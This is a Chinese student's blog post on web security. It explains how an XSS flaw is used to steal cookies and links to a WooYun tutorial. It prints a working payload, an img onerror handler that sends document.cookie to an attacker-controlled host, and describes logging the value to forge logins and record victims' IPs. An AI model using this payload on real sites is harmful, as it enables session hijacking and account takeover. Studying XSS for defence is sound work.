kangkangblog

Menu

web安全之xss攻击

在今年的5月16号我注册了乌云账号。

虽然只是有一个账号但是也是让我高兴了一段很长的时间

自己还没有开始学习web安全渗透方面的。

我想也许会在大三的下学期学习。

近来还是先学习web方面的开发。毕竟不能半桶水的!

学习效率缓慢,时间堆上了,可知识跟不上来,让我不禁神伤。

别的先不说了。

今天说一下XSS 的shell

一般我们挖到了一个xss漏洞。

可以获得当前用户的cookie

document.cookie

cookie的获得我们还可以构造出一个对自己所能控制的服务器(自己能够操作的,有权限的)的get请求

例如发现了一个简单的xss漏洞

<img src=1 onerror="this.src='www.kang.com/xxx.php?a='+document.cookie">

我们通过对我们可控的服务器的xxx.php发送一个get请求,a为get参数。当前网站的document.cookie被 我们当成请求的值传递过去

在xxx.php

我们只要监控$_GET['a'] 将每一个$_GET['a'] 的值记录下来。我们就可以得到受害者的cookie进行伪造登录等等

就此我们还可以进行很多操作。比如记录受害人的ip地址浏览器版本都是可以的

思路要大一些

附上乌云以为大牛的xss渗透教程

http://wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90

just do it

加油努力整

学习效率高一些。再高一些

1

— 于 共写了630个字
— 文内使用到的标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注